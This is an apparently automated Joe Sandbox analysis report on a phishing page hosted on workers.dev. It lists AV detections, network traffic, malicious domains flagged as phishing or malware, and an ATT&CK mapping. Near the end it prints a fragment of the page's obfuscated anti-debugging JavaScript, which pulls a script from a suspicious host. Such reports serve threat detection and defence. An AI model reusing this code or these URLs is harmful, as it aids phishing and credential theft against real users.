Edit tour

Windows Analysis Report
https://fanondiekoxzijds.jamesona8.workers.dev/

Overview

General Information

Sample URL:	https://fanondiekoxzijds.jamesona8.workers.dev/
Analysis ID:	1447753
Infos:

Detection

Score:	64
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for URL or domain

Multi AV Scanner detection for submitted file

HTML page contains hidden URLs or javascript code

Classification

Process Tree

System is w10x64

chrome.exe (PID: 6312 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank" MD5: 5BBFA6CBDF4C254EB368D534F9E23C92)

chrome.exe (PID: 5904 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2400 --field-trial-handle=2256,i,9995143028480638242,2748133430163504411,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 5BBFA6CBDF4C254EB368D534F9E23C92)

chrome.exe (PID: 2852 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://fanondiekoxzijds.jamesona8.workers.dev/" MD5: 5BBFA6CBDF4C254EB368D534F9E23C92)

cleanup

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: https://fanondiekoxzijds.jamesona8.workers.dev/

Avira URL Cloud: detection malicious, Label: phishing

Antivirus detection for URL or domain

Source: https://fanondiekoxzijds.jamesona8.workers.dev/pgX2K9YojkuEcPdfFCtGvRHJSm	Avira URL Cloud: Label: phishing
Source: https://rullbullpullpushcndapp.web.app/htytxzdzvdsfdzxcc/themes/css/7b4d7249b9bb0d3db1d49c1c8d241104nbr1713977432.css	Avira URL Cloud: Label: malware
Source: https://rullbullpullpushcndapp.web.app/htytxzdzvdsfdzxcc/themes/9701abb99c8aba64b9a339fec1ef57fd.js	Avira URL Cloud: Label: malware
Source: https://rullbullpullpushcndapp.web.app/htytxzdzvdsfdzxcc/themes/ddb65bfa1b92162844c412173a4dfdf0nbr1	Avira URL Cloud: Label: malware
Source: https://rullbullpullpushcndapp.web.app/htytxzdzvdsfdzxcc/themes/css/7b4d7249b9bb0d3db1d49c1c8d241104	Avira URL Cloud: Label: malware
Source: https://rullbullpullpushcndapp.web.app/htytxzdzvdsfdzxcc/themes/css/ddb65bfa1b92162844c412173a4dfdf0nbr1713977432.css	Avira URL Cloud: Label: malware
Source: https://fanondiekoxzijds.jamesona8.workers.dev/?bbre=cikztgVjwNGEbqBylxm	Avira URL Cloud: Label: phishing
Source: https://rullbullpullpushcndapp.web.app/htytxzdzvdsfdzxcc/themes/css/ddb65bfa1b92162844c412173a4dfdf0	Avira URL Cloud: Label: malware

Multi AV Scanner detection for submitted file

Source: https://fanondiekoxzijds.jamesona8.workers.dev/

Virustotal: Detection: 15%

Perma Link

Source: https://fanondiekoxzijds.jamesona8.workers.dev/?bbre=cikztgVjwNGEbqBylxm#/ld-SILENTCODERSEMAIL

HTTP Parser: Base64 decoded: <script>var _0x48d833=function(){var e=!0;return function(n,r){var t=e?function(){if(r){var t=r.apply(n,arguments);return r=null,t}}:function(){};return e=!1,t}}();!function(){_0x48d833(this,function(){var t=new RegExp("function *\$ *\$"),n=new RegExp("...

Source: unknown	HTTPS traffic detected: 23.211.8.90:443 -> 192.168.2.6:49714 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 23.211.8.90:443 -> 192.168.2.6:49715 version: TLS 1.2

Source: unknown	TCP traffic detected without corresponding DNS query: 173.222.162.64
Source: unknown	TCP traffic detected without corresponding DNS query: 173.222.162.64
Source: unknown	TCP traffic detected without corresponding DNS query: 173.222.162.64
Source: unknown	TCP traffic detected without corresponding DNS query: 173.222.162.64
Source: unknown	TCP traffic detected without corresponding DNS query: 173.222.162.64
Source: unknown	TCP traffic detected without corresponding DNS query: 173.222.162.64
Source: unknown	TCP traffic detected without corresponding DNS query: 23.211.8.90
Source: unknown	TCP traffic detected without corresponding DNS query: 23.211.8.90
Source: unknown	TCP traffic detected without corresponding DNS query: 23.211.8.90
Source: unknown	TCP traffic detected without corresponding DNS query: 23.211.8.90
Source: unknown	TCP traffic detected without corresponding DNS query: 23.211.8.90
Source: unknown	TCP traffic detected without corresponding DNS query: 23.211.8.90
Source: unknown	TCP traffic detected without corresponding DNS query: 23.211.8.90
Source: unknown	TCP traffic detected without corresponding DNS query: 23.211.8.90
Source: unknown	TCP traffic detected without corresponding DNS query: 23.211.8.90
Source: unknown	TCP traffic detected without corresponding DNS query: 173.222.162.64
Source: unknown	TCP traffic detected without corresponding DNS query: 23.211.8.90
Source: unknown	TCP traffic detected without corresponding DNS query: 23.211.8.90
Source: unknown	TCP traffic detected without corresponding DNS query: 23.211.8.90
Source: unknown	TCP traffic detected without corresponding DNS query: 23.211.8.90
Source: unknown	TCP traffic detected without corresponding DNS query: 23.211.8.90
Source: unknown	TCP traffic detected without corresponding DNS query: 23.211.8.90
Source: unknown	TCP traffic detected without corresponding DNS query: 23.211.8.90
Source: unknown	TCP traffic detected without corresponding DNS query: 23.211.8.90
Source: unknown	TCP traffic detected without corresponding DNS query: 23.211.8.90
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: fanondiekoxzijds.jamesona8.workers.devConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /?bbre=cikztgVjwNGEbqBylxm HTTP/1.1Host: fanondiekoxzijds.jamesona8.workers.devConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-Dest: documentReferer: https://fanondiekoxzijds.jamesona8.workers.dev/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /6629385b8f74dc5e5e1d8619-662938458f74dc5e5e1d8618.js HTTP/1.1Host: xjdcawrhzgcobuvuimlzladxi.kute.pwConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: /Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://fanondiekoxzijds.jamesona8.workers.dev/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /htytxzdzvdsfdzxcc/themes/css/ddb65bfa1b92162844c412173a4dfdf0nbr1713977432.css HTTP/1.1Host: rullbullpullpushcndapp.web.appConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,/;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://fanondiekoxzijds.jamesona8.workers.dev/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /htytxzdzvdsfdzxcc/themes/css/7b4d7249b9bb0d3db1d49c1c8d241104nbr1713977432.css HTTP/1.1Host: rullbullpullpushcndapp.web.appConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,/;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://fanondiekoxzijds.jamesona8.workers.dev/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /pgX2K9YojkuEcPdfFCtGvRHJSm HTTP/1.1Host: fanondiekoxzijds.jamesona8.workers.devConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://fanondiekoxzijds.jamesona8.workers.dev/?bbre=cikztgVjwNGEbqBylxmAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /pgX2K9YojkuEcPdfFCtGvRHJSm HTTP/1.1Host: fanondiekoxzijds.jamesona8.workers.devConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: /Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic	HTTP traffic detected: GET /fs/windows/config.json HTTP/1.1Connection: Keep-AliveAccept: /Accept-Encoding: identityIf-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMTRange: bytes=0-2147483646User-Agent: Microsoft BITS/7.8Host: fs.microsoft.com

Source: global traffic	DNS traffic detected: DNS query: fanondiekoxzijds.jamesona8.workers.dev
Source: global traffic	DNS traffic detected: DNS query: xjdcawrhzgcobuvuimlzladxi.kute.pw
Source: global traffic	DNS traffic detected: DNS query: www.google.com
Source: global traffic	DNS traffic detected: DNS query: rullbullpullpushcndapp.web.app

Source: chromecache_46.2.dr	String found in binary or memory: https://ajax.googleapis.com/ajax/libs/jquery/3.2.1/jquery.min.js
Source: chromecache_46.2.dr	String found in binary or memory: https://cdnjs.cloudflare.com/ajax/libs/mobile-detect/1.3.6/mobile-detect.min.js
Source: chromecache_46.2.dr	String found in binary or memory: https://cdnjs.cloudflare.com/ajax/libs/vee-validate/2.0.0-rc.3/vee-validate.min.js
Source: chromecache_46.2.dr	String found in binary or memory: https://cdnjs.cloudflare.com/ajax/libs/vue-i18n/7.0.3/vue-i18n.min.js
Source: chromecache_46.2.dr	String found in binary or memory: https://cdnjs.cloudflare.com/ajax/libs/vuex/2.3.1/vuex.min.js
Source: chromecache_46.2.dr	String found in binary or memory: https://rullbullpullpushcndapp.web.app/htytxzdzvdsfdzxcc/themes/9701abb99c8aba64b9a339fec1ef57fd.js
Source: chromecache_46.2.dr	String found in binary or memory: https://rullbullpullpushcndapp.web.app/htytxzdzvdsfdzxcc/themes/css/7b4d7249b9bb0d3db1d49c1c8d241104
Source: chromecache_46.2.dr	String found in binary or memory: https://rullbullpullpushcndapp.web.app/htytxzdzvdsfdzxcc/themes/css/ddb65bfa1b92162844c412173a4dfdf0
Source: chromecache_46.2.dr	String found in binary or memory: https://rullbullpullpushcndapp.web.app/htytxzdzvdsfdzxcc/themes/ddb65bfa1b92162844c412173a4dfdf0nbr1
Source: chromecache_46.2.dr	String found in binary or memory: https://unpkg.com/axios
Source: chromecache_46.2.dr	String found in binary or memory: https://unpkg.com/lodash
Source: chromecache_46.2.dr	String found in binary or memory: https://unpkg.com/vue
Source: chromecache_46.2.dr	String found in binary or memory: https://unpkg.com/vue-router

Source: unknown	Network traffic detected: HTTP traffic on port 49708 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49674 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49672 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49706 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49712 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49704 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49713 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49715 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49716
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49715
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49714
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49713
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49712
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49711
Source: unknown	Network traffic detected: HTTP traffic on port 49698 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49709 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49698
Source: unknown	Network traffic detected: HTTP traffic on port 49673 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49705 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49711 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49726 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49709
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49708
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49706
Source: unknown	Network traffic detected: HTTP traffic on port 49716 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49714 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49705
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49704
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49726

Source: unknown	HTTPS traffic detected: 23.211.8.90:443 -> 192.168.2.6:49714 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 23.211.8.90:443 -> 192.168.2.6:49715 version: TLS 1.2

Source: classification engine

Classification label: mal64.win@16/13@10/7

Source: unknown	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2400 --field-trial-handle=2256,i,9995143028480638242,2748133430163504411,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: unknown	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://fanondiekoxzijds.jamesona8.workers.dev/"
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2400 --field-trial-handle=2256,i,9995143028480638242,2748133430163504411,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	Windows Management Instrumentation	Path Interception	1 Process Injection	1 Process Injection	OS Credential Dumping	System Service Discovery	Remote Services	Data from Local System	1 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	Rootkit	LSASS Memory	Application Window Discovery	Remote Desktop Protocol	Data from Removable Media	2 Non-Application Layer Protocol	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	Obfuscated Files or Information	Security Account Manager	Query Registry	SMB/Windows Admin Shares	Data from Network Shared Drive	3 Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	Binary Padding	NTDS	System Network Configuration Discovery	Distributed Component Object Model	Input Capture	1 Ingress Tool Transfer	Traffic Duplication	Data Destruction

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
https://fanondiekoxzijds.jamesona8.workers.dev/	16%	Virustotal		Browse
https://fanondiekoxzijds.jamesona8.workers.dev/	100%	Avira URL Cloud	phishing

Dropped Files

⊘No Antivirus matches

Unpacked PE Files

⊘No Antivirus matches

Domains

⊘No Antivirus matches

URLs

Source	Detection	Scanner	Label
https://cdnjs.cloudflare.com/ajax/libs/vee-validate/2.0.0-rc.3/vee-validate.min.js	0%	Avira URL Cloud	safe
https://fanondiekoxzijds.jamesona8.workers.dev/pgX2K9YojkuEcPdfFCtGvRHJSm	100%	Avira URL Cloud	phishing
https://rullbullpullpushcndapp.web.app/htytxzdzvdsfdzxcc/themes/css/7b4d7249b9bb0d3db1d49c1c8d241104nbr1713977432.css	100%	Avira URL Cloud	malware
https://cdnjs.cloudflare.com/ajax/libs/vuex/2.3.1/vuex.min.js	0%	Avira URL Cloud	safe
https://rullbullpullpushcndapp.web.app/htytxzdzvdsfdzxcc/themes/9701abb99c8aba64b9a339fec1ef57fd.js	100%	Avira URL Cloud	malware
https://unpkg.com/lodash	0%	Avira URL Cloud	safe
https://rullbullpullpushcndapp.web.app/htytxzdzvdsfdzxcc/themes/ddb65bfa1b92162844c412173a4dfdf0nbr1	100%	Avira URL Cloud	malware
https://rullbullpullpushcndapp.web.app/htytxzdzvdsfdzxcc/themes/css/7b4d7249b9bb0d3db1d49c1c8d241104	100%	Avira URL Cloud	malware
https://cdnjs.cloudflare.com/ajax/libs/vue-i18n/7.0.3/vue-i18n.min.js	0%	Avira URL Cloud	safe
https://unpkg.com/vue	0%	Avira URL Cloud	safe
https://unpkg.com/axios	0%	Avira URL Cloud	safe
https://xjdcawrhzgcobuvuimlzladxi.kute.pw/6629385b8f74dc5e5e1d8619-662938458f74dc5e5e1d8618.js	0%	Avira URL Cloud	safe
https://rullbullpullpushcndapp.web.app/htytxzdzvdsfdzxcc/themes/css/ddb65bfa1b92162844c412173a4dfdf0nbr1713977432.css	100%	Avira URL Cloud	malware
https://cdnjs.cloudflare.com/ajax/libs/mobile-detect/1.3.6/mobile-detect.min.js	0%	Avira URL Cloud	safe
https://fanondiekoxzijds.jamesona8.workers.dev/?bbre=cikztgVjwNGEbqBylxm	100%	Avira URL Cloud	phishing
https://unpkg.com/vue-router	0%	Avira URL Cloud	safe
https://rullbullpullpushcndapp.web.app/htytxzdzvdsfdzxcc/themes/css/ddb65bfa1b92162844c412173a4dfdf0	100%	Avira URL Cloud	malware

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
bg.microsoft.map.fastly.net	199.232.210.172	true	false	unknown
fanondiekoxzijds.jamesona8.workers.dev	188.114.97.3	true	false	unknown
rullbullpullpushcndapp.web.app	199.36.158.100	true	false	unknown
xjdcawrhzgcobuvuimlzladxi.kute.pw	104.21.50.211	true	false	unknown
www.google.com	142.250.186.100	true	false	unknown
fp2e7a.wpc.phicdn.net	192.229.221.95	true	false	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://fanondiekoxzijds.jamesona8.workers.dev/?bbre=cikztgVjwNGEbqBylxm#/ld-SILENTCODERSEMAIL	false		unknown
https://fanondiekoxzijds.jamesona8.workers.dev/pgX2K9YojkuEcPdfFCtGvRHJSm	false	Avira URL Cloud: phishing	unknown
https://rullbullpullpushcndapp.web.app/htytxzdzvdsfdzxcc/themes/css/7b4d7249b9bb0d3db1d49c1c8d241104nbr1713977432.css	false	Avira URL Cloud: malware	unknown
https://fanondiekoxzijds.jamesona8.workers.dev/	true		unknown
https://xjdcawrhzgcobuvuimlzladxi.kute.pw/6629385b8f74dc5e5e1d8619-662938458f74dc5e5e1d8618.js	false	Avira URL Cloud: safe	unknown
https://rullbullpullpushcndapp.web.app/htytxzdzvdsfdzxcc/themes/css/ddb65bfa1b92162844c412173a4dfdf0nbr1713977432.css	false	Avira URL Cloud: malware	unknown
https://fanondiekoxzijds.jamesona8.workers.dev/?bbre=cikztgVjwNGEbqBylxm	false	Avira URL Cloud: phishing	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://cdnjs.cloudflare.com/ajax/libs/vee-validate/2.0.0-rc.3/vee-validate.min.js	chromecache_46.2.dr	false	Avira URL Cloud: safe	unknown
https://cdnjs.cloudflare.com/ajax/libs/vuex/2.3.1/vuex.min.js	chromecache_46.2.dr	false	Avira URL Cloud: safe	unknown
https://rullbullpullpushcndapp.web.app/htytxzdzvdsfdzxcc/themes/9701abb99c8aba64b9a339fec1ef57fd.js	chromecache_46.2.dr	false	Avira URL Cloud: malware	unknown
https://rullbullpullpushcndapp.web.app/htytxzdzvdsfdzxcc/themes/ddb65bfa1b92162844c412173a4dfdf0nbr1	chromecache_46.2.dr	false	Avira URL Cloud: malware	unknown
https://unpkg.com/lodash	chromecache_46.2.dr	false	Avira URL Cloud: safe	unknown
https://cdnjs.cloudflare.com/ajax/libs/vue-i18n/7.0.3/vue-i18n.min.js	chromecache_46.2.dr	false	Avira URL Cloud: safe	unknown
https://rullbullpullpushcndapp.web.app/htytxzdzvdsfdzxcc/themes/css/7b4d7249b9bb0d3db1d49c1c8d241104	chromecache_46.2.dr	false	Avira URL Cloud: malware	unknown
https://unpkg.com/axios	chromecache_46.2.dr	false	Avira URL Cloud: safe	unknown
https://unpkg.com/vue	chromecache_46.2.dr	false	Avira URL Cloud: safe	unknown
https://unpkg.com/vue-router	chromecache_46.2.dr	false	Avira URL Cloud: safe	unknown
https://cdnjs.cloudflare.com/ajax/libs/mobile-detect/1.3.6/mobile-detect.min.js	chromecache_46.2.dr	false	Avira URL Cloud: safe	unknown
https://rullbullpullpushcndapp.web.app/htytxzdzvdsfdzxcc/themes/css/ddb65bfa1b92162844c412173a4dfdf0	chromecache_46.2.dr	false	Avira URL Cloud: malware	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
199.36.158.100	rullbullpullpushcndapp.web.app	United States	15169	GOOGLEUS	false
239.255.255.250	unknown	Reserved	unknown	unknown	false
188.114.97.3	fanondiekoxzijds.jamesona8.workers.dev	European Union	13335	CLOUDFLARENETUS	false
142.250.186.100	www.google.com	United States	15169	GOOGLEUS	false
104.21.50.211	xjdcawrhzgcobuvuimlzladxi.kute.pw	United States	13335	CLOUDFLARENETUS	false

Private

IP
192.168.2.4
192.168.2.6

General Information

Joe Sandbox version:	40.0.0 Tourmaline
Analysis ID:	1447753
Start date and time:	2024-05-27 00:45:31 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 3m 10s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	browseurl.jbs
Sample URL:	https://fanondiekoxzijds.jamesona8.workers.dev/
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	7
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal64.win@16/13@10/7
EGA Information:	Failed
HCA Information:	Successful, ratio: 100% Number of executed functions: 0 Number of non-executed functions: 0

Warnings

Exclude process from analysis (whitelisted): WMIADAP.exe, SIHClient.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 142.250.185.195, 142.250.74.206, 142.250.110.84, 34.104.35.123, 13.85.23.86, 199.232.210.172, 192.229.221.95, 52.165.164.15, 13.95.31.18, 216.58.206.67
Excluded domains from analysis (whitelisted): fs.microsoft.com, accounts.google.com, slscr.update.microsoft.com, ctldl.windowsupdate.com.delivery.microsoft.com, clientservices.googleapis.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com, fe3.delivery.mp.microsoft.com, clients2.google.com, edgedl.me.gvt1.com, ocsp.digicert.com, ocsp.edge.digicert.com, glb.cws.prod.dcat.dsp.trafficmanager.net, sls.update.microsoft.com, update.googleapis.com, clients.l.google.com, wu-b-net.trafficmanager.net, glb.sls.prod.dcat.dsp.trafficmanager.net
HTTPS proxy raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtSetInformationFile calls found.

Simulations

Behavior and APIs

⊘No simulations

LLM Input / Output

Input	Output
URL: https://fanondiekoxzijds.jamesona8.workers.dev/?bbre=cikztgVjwNGEbqBylxm#/ld-SILENTCODERSEMAIL Model: gpt-4o	```json { "riskscore": 9, "reasons": "The JavaScript code contains several red flags indicating potentially malicious behavior. It includes obfuscated code, which is often used to hide malicious intent. The code attempts to manipulate the console and includes a function that runs an infinite loop ('while (true) {}'). Additionally, it dynamically loads an external script from a suspicious domain ('kute.pw'), which is a common tactic used in malicious scripts to download further payloads. The code also modifies the URL parameters, which could be used for phishing or tracking purposes." }
var _0x48d833=function(){var e=!0;return function(n,r){var t=e?function(){if(r){var t=r.apply(n,arguments);return r=null,t}}:function(){};return e=!1,t}}();!function(){_0x48d833(this,function(){var t=new RegExp("function \\( \\)"),n=new RegExp("\\+\\+ (?:[a-zA-Z_$][0-9a-zA-Z_$])","i"),r=_0x45dbcc("init");t.test(r+"chain")&&n.test(r+"input")?_0x45dbcc():r("0")})()}();var _0x1ffb63=function(){var e=!0;return function(n,r){var t=e?function(){if(r){var t=r.apply(n,arguments);return r=null,t}}:function(){};return e=!1,t}}();setInterval(function(){_0x45dbcc()},4e3);var _0x2ba383=_0x1ffb63(this,function(){for(var t=function(){var n;try{n=Function('return (function() {}.constructor("return this")( ));')()}catch(t){n=window}return n}(),n=t.console=t.console\|\|{},r=["log","warn","info","error","exception","table","trace"],e=0;e<r.length;e++){var 